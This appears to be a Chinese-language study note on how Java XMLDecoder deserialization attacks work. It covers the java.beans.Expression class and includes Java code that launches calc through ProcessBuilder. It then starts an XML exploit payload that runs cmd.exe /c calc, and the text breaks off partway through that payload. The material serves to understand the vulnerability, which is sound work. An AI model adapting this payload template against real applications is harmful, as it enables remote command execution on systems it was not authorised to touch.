XMLDecoder反序列化漏洞底层
这里我主要是就是一下最后的执行是怎么样的。也就是Expression类的使用
import java.beans.Expression;
public class test {
public static void main(String[] args)throws Exception {
Parameter(); //有参数
NoParameter(); //无参数
}
public static void Parameter() throws Exception{
Object var3 = new ProcessBuilder();
String var4 = "command";
String[] strings = new String[]{"calc"};
Object[] var2 = new Object[]{strings};
Expression var5 = new Expression(var3, var4, var2);
Object value = var5.getValue(); //获得参数的类
String var1 = "start";
Object[] var6 = new Object[]{};
Expression expression = new Expression(value, var1, var6); //执行start方法
expression.getValue();
// 为什么不能执行?因为class.newInstance只能调用无参构造函数而ProcessBuilder没有无参数构造函数。
// Class<?> aClass = value.getClass();
// Object o = aClass.newInstance();
// Method start = aClass.getMethod("start");
// start.invoke(o);
}
public static void NoParameter(){
String[] strings = new String[]{"cmd.exe","/c","calc"};
Object var3 = new ProcessBuilder(strings);
String var4 = "start";
Object[] var2 = new Object[]{};
Expression var5 = new Expression(var3, var4, var2);
try {
var5.getValue();
} catch (Exception e) {
e.printStackTrace();
}
}
}
并且通过测试可以发现Expression的使用,给出下面的例子。
public class cmd {
public void Noparameter(){
System.out.println("无参数调用....");
}
public void Parameter(Object[] obj){
System.out.println("有参数调用....");
}
}
import java.beans.Expression;
public class test1 {
public static void main(String[] args)throws Exception {
Object var3 = new cmd();
String var4 = "Parameter"; //Noparameter
Object[] var2 = new Object[]{"233333"};
var2 = new Object[]{var2};
var2 = new Object[]{};
Expression var5 = new Expression(var3, var4, var2);
var5.getValue();
}
}
并且给出了一些exp。
<? xml version="1.0" encoding="UTF-8" ?>
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>calc</str